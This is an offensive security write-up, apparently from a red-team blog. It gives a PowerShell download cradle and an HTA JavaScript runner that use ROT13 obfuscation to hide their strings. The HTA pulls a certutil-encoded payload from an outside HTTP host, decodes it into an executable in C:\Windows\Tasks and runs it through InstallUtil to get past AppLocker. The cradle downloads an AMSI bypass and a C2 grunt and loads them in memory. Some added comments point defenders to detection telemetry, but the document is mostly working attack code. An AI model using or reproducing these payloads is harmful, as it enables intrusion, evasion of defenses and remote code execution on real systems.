HTA JavaScript runner + AppLocker bypass

HTA Javascript with staged payload delivery + AppLocker bypass

HTA - embedded JavaScript

Create a binary to use with installutil, place the commands to run within the binary, and compile it. After compilation, encode the binary to a file (file.txt) using certutil -encode. The script below pulls file.txt, places it in c:\windows\tasks, decodes it back into an exe and then executes it with installutil.exe.

Within the compiled exe that is executed by installutil.exe place powershell commands that do something like bypass amsi and then reflectively load a grunt or shellcode embedded in a C# shellcode runner.

The obfuscation is simple but effective (ROT13):

HTA JavaScript runner

Note: it may have to be run twice to get full execution; if it must run only once, add a sleep timer to allow file.txt to be decoded first.


cradle.ps1

# Stage 1: fetch a script over plain HTTP and run it in memory via IEX; no file
# is written. The script name (and the description above) indicate it is meant
# to disable AMSI before the assembly below is loaded. The fetched content is
# still recorded by PowerShell script block logging (Event ID 4104), and the
# HTTP request itself is visible on the wire.
(new-object system.net.webclient).downloadstring('http://192.168.0.20:8080/Amsi-Bypass.ps1') | IEX
# Stage 2: download the .NET assembly as a raw byte array.
$a=(new-object system.net.webclient).downloaddata('http://192.168.0.20:8080/modhttpgrunt.exe')
# Load the assembly directly from the byte array, so it never touches disk.
# On .NET Framework 4.8+ Assembly.Load(byte[]) is itself submitted to AMSI,
# which is why the bypass runs first.
[System.Reflection.Assembly]::Load($a)
# Invoke the entry point; Integral.Integral.Execute lives in the downloaded
# binary, not in this script.
[Integral.Integral]::Execute()

hta_runner.hta

// Delete out comments prior to delivery
<!DOCTYPE html>
<html>
<head>
<title>HTA</title>
<meta http-equiv="x-ua-compatible" content="IE=edge" />
<script language="JScript">

    // Substitution tables used by scram(). ranalph is alph rotated by 13
    // positions (plain ROT13), so one pass of scram() turns the stored
    // literals back into plaintext. Digits and the characters in sym pass
    // through unchanged; anything not in a table is dropped by scram().
    var alph = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".split("");
    var ranalph = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm".split("");
    var num = "0123456789".split("");
    var sym = "/$:;-\\%#*&!. ".split("");
    //certutil.exe -urlcache -split -f 
    // ROT13 form of the certutil download command above. Every command string
    // in this file is kept encoded so that the .hta on disk contains none of
    // the tool names; scram() produces the real string only at run time.
    var sample = " preghgvy.rkr -heypnpur -fcyvg -s ";

    // Decodes (or encodes; ROT13 is its own inverse) a string character by
    // character: letters are mapped through alph -> ranalph, digits and the
    // characters listed in sym are copied as-is, and any other character is
    // silently dropped because no branch appends it. Returns the rebuilt
    // string. The parameter shadows the global `sample` of the same name.
    //
    // Defender note: this only hides strings from static inspection of the
    // file. The decoded command line is handed to WScript.Shell.Run below, so
    // it appears in plaintext in process-creation telemetry (Security 4688
    // with command-line auditing, Sysmon Event ID 1) and in AMSI script scans.
    var scram = function(sample) {
	var result = "";
	for (var x=0; x<sample.length; x++) {
		// Letter: emit the character 13 positions away in the same case.
		for (var y=0; y<alph.length; y++) {
			if (sample[x]==alph[y]) {
				result+=ranalph[y];
			}
		}
        // Allowed punctuation passes through untouched.
        for (var s=0; s<sym.length; s++) {
            if(sample[x]==sym[s]) {
                result+=sym[s];
            }
        }
        // Digits pass through untouched.
        for (var n=0; n<num.length; n++) {
            if(sample[x]==num[n]) {
                result+=num[n];
            }
        }
        
	}
	return result.toString();
    }
    
    //stage 1 delivery
    // str1 decodes to " certutil.exe -urlcache -split -f " (note the leading
    // and trailing spaces); certutil acting as a downloader is a well-known
    // LOLBin pattern worth alerting on.
    str1 = scram(sample);
    //Wscript.shell
    // wobj decodes to the ProgID passed to ActiveXObject below.
    sample = "Jfpevcg.furyy";
    wobj = scram(sample);
    // 192.168.49.122:8080/file.txt C:\\Windows\\Tasks\\file.txt
    // str2 is the download source and the drop path. C:\Windows\Tasks is
    // user-writable on default installs, which is presumably why it was
    // chosen; a file written there by certutil.exe is a strong signal.
    sample = "192.168.49.122:8080/svyr.gkg P:\\Jvaqbjf\\Gnfxf\\svyr.gkg" //modify IP:PORT and payload as required;
    str2 = scram(sample);
    //http://
    // The scheme is kept in its own string so that "http" is only ever
    // assembled at run time (see the comment on cmd below).
    sample = "uggc://"
    str3 = scram(sample);

    //stage 2 setup
    // certutil -decode C:\\Windows\\Tasks\\file.txt C:\\Windows\\Tasks\\bp.exe
    // str4 turns the certutil -encode'd text back into an executable on disk.
    sample = "preghgvy -qrpbqr P:\\Jvaqbjf\\Gnfxf\\svyr.gkg P:\\Jvaqbjf\\Gnfxf\\oc.rkr";
    str4 = scram(sample);

    //stage 3 execution
    // C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Windows\\Tasks\\bp.exe
    // str5 runs the decoded binary through InstallUtil.exe /U (uninstall),
    // which executes the assembly's installer code. Because InstallUtil is a
    // Microsoft-signed binary under C:\Windows, it is presumably what the
    // "AppLocker bypass" in the title refers to; InstallUtil.exe launching an
    // assembly from outside Program Files/Windows is the detection point.
    sample = "P:\\Jvaqbjf\\Zvpebfbsg.ARG\\Senzrjbex64\\i4.0.30319\\VafgnyyHgvy.rkr /ybtsvyr= /YbtGbPbafbyr=snyfr /H P:\\Jvaqbjf\\Gnfxf\\oc.rkr";
    str5 = scram(sample);

    // WScript.Shell is instantiated from the decoded ProgID string.
    var ex = new ActiveXObject(wobj);
	//%comspec% is an env var for cmd.exe. /v enables delayed expansion so that !t! is expanded when the line runs; set t= stores the string http://, which defender was flagging on, in a variable so the full URL never appears as one literal in this file.
    cmd = "%comspec% /v /c \"set t=" + str3 + "&&" + str1 + "!t!" + str2 + "\"";
    cmd2 = str4;
    cmd3 = str5;
    //alert(cmd);
    //alert(cmd2);
    //alert(cmd3);

    // Each Run() starts a separate child process of mshta.exe: cmd.exe (which
    // launches certutil.exe for the download), certutil.exe (decode), then
    // InstallUtil.exe. That parent/child chain is the hunting signature for
    // this runner. `deploy` is re-declared three times; JScript allows it.
    var deploy = ex.Run(cmd);
    var deploy = ex.Run(cmd2);
    var deploy = ex.Run(cmd3);

</script>
</head>
<body>
<script language="JScript">
    // Closes the HTA window as soon as the body is reached, so the window
    // is only briefly visible after the head script has issued its Run() calls.
    self.close();
</script>
</body>
</html>
******
Written by Shain Lakin on 11 November 2022